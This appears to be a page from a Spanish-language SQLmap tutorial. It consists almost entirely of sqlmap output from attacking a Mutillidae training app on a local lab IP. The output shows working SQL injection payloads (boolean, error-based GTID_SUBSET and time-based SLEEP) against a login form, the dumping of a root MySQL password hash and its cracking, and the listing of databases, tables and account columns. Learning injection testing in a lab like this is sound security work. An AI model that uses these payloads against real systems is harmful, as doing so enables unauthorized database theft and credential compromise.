SQLmap (Funcionalidad - Parte 2)

PreviousSQLmap (Blind SQL Injection - Parte 1)NextPath Traversal o Directory Traversal

Last updated 5 months ago

___ __H__ ___ ___[']_____ ___ ___ {1.8.8#stable} |_ -| . [.] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:19:08 /2024-11-17/ [04:19:09] [INFO] parsing HTTP request from 'request.burp.txt' [04:19:09] [WARNING] provided value for parameter 'redirectPage' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [04:19:09] [INFO] testing connection to the target URL got a 302 redirect to 'http://192.168.5.177/mutillidae/src/index.php?popUpNotificationCode=AU1'. Do you want to follow? [Y/n] n [04:19:11] [INFO] testing if the target URL content is stable [04:19:11] [WARNING] POST parameter 'redirectPage' does not appear to be dynamic [04:19:11] [WARNING] heuristic (basic) test shows that POST parameter 'redirectPage' might not be injectable [04:19:11] [INFO] testing for SQL injection on POST parameter 'redirectPage' [04:19:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [04:19:11] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [04:19:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [04:19:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [04:19:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' [04:19:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [04:19:11] [INFO] testing 'Generic inline queries' [04:19:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [04:19:11] [WARNING] time-based comparison requires larger statistical model, please wait. (done) [04:19:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' [04:19:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' [04:19:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [04:19:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [04:19:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [04:19:12] [INFO] testing 'Oracle AND time-based blind' it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y [04:19:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [04:19:48] [WARNING] POST parameter 'redirectPage' does not seem to be injectable [04:19:48] [WARNING] POST parameter 'username' does not appear to be dynamic [04:19:48] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL') [04:19:49] [INFO] heuristic (XSS) test shows that POST parameter 'username' might be vulnerable to cross-site scripting (XSS) attacks [04:19:49] [INFO] testing for SQL injection on POST parameter 'username' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [04:20:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [04:20:15] [WARNING] reflective value(s) found and filtering out [04:20:15] [INFO] POST parameter 'username' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [04:20:15] [INFO] testing 'Generic inline queries' [04:20:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [04:20:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [04:20:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [04:20:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [04:20:15] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [04:20:15] [INFO] POST parameter 'username' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable [04:20:15] [INFO] testing 'MySQL inline queries' [04:20:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [04:20:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [04:20:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [04:20:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [04:20:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)' [04:20:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)' [04:20:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [04:20:46] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [04:20:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [04:20:46] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [04:20:46] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [04:20:46] [INFO] target URL appears to have 1 column in query do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] n [04:22:06] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') [04:22:06] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [04:22:06] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2') [04:22:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [04:22:08] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns' [04:22:09] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns' [04:22:11] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns' [04:22:12] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns' [04:22:13] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns' [04:22:15] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns' [04:22:16] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns' [04:22:18] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns' [04:22:19] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns' POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 324 HTTP(s) requests: --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: redirectPage=&username=diseo' AND 1840=1840 AND 'ancZ'='ancZ&password=password&login-php-submit-button=Login Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: redirectPage=&username=diseo' AND GTID_SUBSET(CONCAT(0x71626b7871,(SELECT (ELT(7257=7257,1))),0x716b766a71),7257) AND 'UBVb'='UBVb&password=password&login-php-submit-button=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: redirectPage=&username=diseo' AND (SELECT 7561 FROM (SELECT(SLEEP(5)))JwnU) AND 'Vgqz'='Vgqz&password=password&login-php-submit-button=Login --- [04:22:30] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.58 back-end DBMS: MySQL >= 5.6 [04:22:30] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.177' [*] ending @ 04:22:30 /2024-11-17/

___ __H__ ___ ___["]_____ ___ ___ {1.8.8#stable} |_ -| . ["] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:35:17 /2024-11-17/ [04:35:17] [INFO] parsing HTTP request from 'request.burp.txt' [04:35:17] [INFO] resuming back-end DBMS 'mysql' [04:35:17] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: redirectPage=&username=diseo' AND 9177=9177 AND 'rqfz'='rqfz&password=password&login-php-submit-button=Login --- [04:35:17] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.58 back-end DBMS: MySQL >= 5.6 [04:35:17] [INFO] fetching current user [04:35:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [04:35:17] [INFO] retrieved: root@localhost current user: 'root@localhost' [04:35:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.177' [*] ending @ 04:35:20 /2024-11-17/

___ __H__ ___ ___[,]_____ ___ ___ {1.8.8#stable} |_ -| . [)] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:40:24 /2024-11-17/ [04:40:24] [INFO] parsing HTTP request from 'request.burp.txt' [04:40:24] [INFO] resuming back-end DBMS 'mysql' [04:40:24] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: redirectPage=&username=diseo' AND 9177=9177 AND 'rqfz'='rqfz&password=password&login-php-submit-button=Login --- [04:40:24] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.58 back-end DBMS: MySQL >= 5.6 [04:40:24] [INFO] fetching database users password hashes [04:40:24] [INFO] fetching number of password hashes for user 'root' [04:40:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [04:40:24] [INFO] retrieved: 1 [04:40:27] [INFO] fetching password hashes for user 'root' [04:40:27] [INFO] retrieved: *E82A07F59B0D83BEF29F79E41FA0F8A042CE3DE4 do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y [04:40:33] [INFO] using hash method 'mysql_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [04:40:33] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [04:40:33] [INFO] starting dictionary-based cracking (mysql_passwd) [04:40:33] [INFO] starting 16 processes [04:40:41] [WARNING] no clear password(s) found database management system users password hashes: [*] root [1]: password hash: *E82A07F59B0D83BEF29F79E41FA0F8A042CE3DE4 [04:40:41] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.177' [*] ending @ 04:40:41 /2024-11-17/

Using default input encoding: UTF-8 Loaded 1 password hash (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x]) Warning: no OpenMP support for this hash type, consider --fork=16 Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 7 candidates left, minimum 8 needed for performance. mutillidae (?) 1g 0:00:00:00 DONE (2024-11-17 04:43) 100.0g/s 700.0p/s 700.0c/s 700.0C/s mutillidae..root Use the "--show" option to display all of the cracked passwords reliably Session completed.

___ __H__ ___ ___[)]_____ ___ ___ {1.8.8#stable} |_ -| . [)] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:47:12 /2024-11-17/ [04:47:12] [INFO] parsing HTTP request from 'request.burp.txt' [04:47:12] [DEBUG] cleaning up configuration parameters [04:47:12] [DEBUG] setting the HTTP timeout [04:47:12] [DEBUG] setting the HTTP User-Agent header [04:47:12] [DEBUG] creating HTTP requests opener object [04:47:12] [WARNING] provided value for parameter 'redirectPage' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [04:47:12] [INFO] resuming back-end DBMS 'mysql' [04:47:12] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: redirectPage=&username=diseo' AND 9177=9177 AND 'rqfz'='rqfz&password=password&login-php-submit-button=Login Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: redirectPage=&username=diseo' AND GTID_SUBSET(CONCAT(0x717a7a7171,(SELECT (ELT(6087=6087,1))),0x717a786b71),6087) AND 'jgxG'='jgxG&password=password&login-php-submit-button=Login Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: redirectPage=&username=diseo' AND (SELECT 6646 FROM (SELECT(SLEEP(5)))lzmE) AND 'tJsu'='tJsu&password=password&login-php-submit-button=Login Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) --- [04:47:12] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.58 back-end DBMS: MySQL >= 5.6 [04:47:12] [INFO] fetching database names [04:47:12] [PAYLOAD] diseo' AND GTID_SUBSET(CONCAT(0x717a7a7171,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x717a786b71),9883) AND 'ZCyi'='ZCyi [04:47:12] [DEBUG] declared web page charset 'utf-8' [04:47:13] [WARNING] reflective value(s) found and filtering out [04:47:13] [DEBUG] used SQL query returns 5 entries [04:47:13] [PAYLOAD] diseo' AND GTID_SUBSET(CONCAT(0x717a7a7171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x717a786b71),6329) AND 'Pdkx'='Pdkx [04:47:13] [INFO] retrieved: 'mysql' [04:47:13] [PAYLOAD] diseo' AND GTID_SUBSET(CONCAT(0x717a7a7171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x717a786b71),4368) AND 'TPct'='TPct [04:47:14] [INFO] retrieved: 'information_schema' [04:47:14] [PAYLOAD] diseo' AND GTID_SUBSET(CONCAT(0x717a7a7171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x717a786b71),9810) AND 'Wlpv'='Wlpv [04:47:15] [INFO] retrieved: 'performance_schema' [04:47:15] [PAYLOAD] diseo' AND GTID_SUBSET(CONCAT(0x717a7a7171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),0x717a786b71),9597) AND 'IrYg'='IrYg [04:47:15] [INFO] retrieved: 'sys' [04:47:15] [PAYLOAD] diseo' AND GTID_SUBSET(CONCAT(0x717a7a7171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),0x717a786b71),5451) AND 'mlAk'='mlAk [04:47:16] [INFO] retrieved: 'mutillidae' [04:47:16] [DEBUG] performed 6 queries in 3.32 seconds available databases [5]: [*] information_schema [*] mutillidae [*] mysql [*] performance_schema [*] sys [04:47:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.177' [*] ending @ 04:47:16 /2024-11-17/

___ __H__ ___ ___["]_____ ___ ___ {1.8.8#stable} |_ -| . [)] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:59:46 /2024-11-17/ [04:59:46] [INFO] parsing HTTP request from 'request.burp.txt' [04:59:46] [WARNING] provided value for parameter 'redirectPage' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [04:59:46] [INFO] resuming back-end DBMS 'mysql' [04:59:46] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: redirectPage=&username=diseo' AND 9177=9177 AND 'rqfz'='rqfz&password=password&login-php-submit-button=Login Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: redirectPage=&username=diseo' AND GTID_SUBSET(CONCAT(0x717a7a7171,(SELECT (ELT(6087=6087,1))),0x717a786b71),6087) AND 'jgxG'='jgxG&password=password&login-php-submit-button=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: redirectPage=&username=diseo' AND (SELECT 6646 FROM (SELECT(SLEEP(5)))lzmE) AND 'tJsu'='tJsu&password=password&login-php-submit-button=Login --- [04:59:46] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.58 back-end DBMS: MySQL >= 5.6 [04:59:46] [INFO] fetching tables for database: 'mutillidae' [04:59:46] [INFO] resumed: 'accounts' [04:59:46] [INFO] resumed: 'blogs_table' [04:59:46] [INFO] resumed: 'captured_data' [04:59:46] [INFO] resumed: 'credit_cards' [04:59:46] [INFO] resumed: 'help_texts' [04:59:46] [INFO] resumed: 'hitlog' [04:59:46] [INFO] resumed: 'level_1_help_include_files' [04:59:46] [INFO] resumed: 'page_help' [04:59:46] [INFO] resumed: 'page_hints' [04:59:46] [INFO] resumed: 'pen_test_tools' [04:59:46] [INFO] resumed: 'security_level' [04:59:46] [INFO] resumed: 'user_poll_results' [04:59:46] [INFO] resumed: 'youTubeVideos' Database: mutillidae [13 tables] +----------------------------+ | accounts | | blogs_table | | captured_data | | credit_cards | | help_texts | | hitlog | | level_1_help_include_files | | page_help | | page_hints | | pen_test_tools | | security_level | | user_poll_results | | youTubeVideos | +----------------------------+ [04:59:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.177' [*] ending @ 04:59:46 /2024-11-17/

___ __H__ ___ ___[,]_____ ___ ___ {1.8.8#stable} |_ -| . ["] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 05:01:34 /2024-11-17/ [05:01:34] [INFO] parsing HTTP request from 'request.burp.txt' [05:01:34] [WARNING] provided value for parameter 'redirectPage' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [05:01:34] [INFO] resuming back-end DBMS 'mysql' [05:01:34] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: redirectPage=&username=diseo' AND 9177=9177 AND 'rqfz'='rqfz&password=password&login-php-submit-button=Login Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: redirectPage=&username=diseo' AND GTID_SUBSET(CONCAT(0x717a7a7171,(SELECT (ELT(6087=6087,1))),0x717a786b71),6087) AND 'jgxG'='jgxG&password=password&login-php-submit-button=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: redirectPage=&username=diseo' AND (SELECT 6646 FROM (SELECT(SLEEP(5)))lzmE) AND 'tJsu'='tJsu&password=password&login-php-submit-button=Login --- [05:01:34] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.58 back-end DBMS: MySQL >= 5.6 [05:01:34] [INFO] fetching columns for table 'accounts' in database 'mutillidae' [05:01:34] [WARNING] reflective value(s) found and filtering out [05:01:35] [INFO] retrieved: 'cid' [05:01:35] [INFO] retrieved: 'int' [05:01:36] [INFO] retrieved: 'username' [05:01:36] [INFO] retrieved: 'varchar(255)' [05:01:37] [INFO] retrieved: 'password' [05:01:37] [INFO] retrieved: 'varchar(255)' [05:01:38] [INFO] retrieved: 'mysignature' [05:01:38] [INFO] retrieved: 'text' [05:01:38] [INFO] retrieved: 'is_admin' [05:01:38] [INFO] retrieved: 'tinyint(1)' [05:01:38] [INFO] retrieved: 'firstname' [05:01:38] [INFO] retrieved: 'varchar(255)' [05:01:38] [INFO] retrieved: 'lastname' [05:01:38] [INFO] retrieved: 'varchar(255)' [05:01:38] [INFO] retrieved: 'client_id' [05:01:38] [INFO] retrieved: 'char(32)' [05:01:38] [INFO] retrieved: 'client_secret' [05:01:39] [INFO] retrieved: 'varchar(64)' [05:01:39] [INFO] retrieved: 'created_at' [05:01:39] [INFO] retrieved: 'timestamp' Database: mutillidae Table: accounts [10 columns] +---------------+--------------+ | Column | Type | +---------------+--------------+ | cid | int | | client_id | char(32) | | client_secret | varchar(64) | | created_at | timestamp | | firstname | varchar(255) | | is_admin | tinyint(1) | | lastname | varchar(255) | | mysignature | text | | password | varchar(255) | | username | varchar(255) | +---------------+--------------+ [05:01:39] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.177' [*] ending @ 05:01:39 /2024-11-17/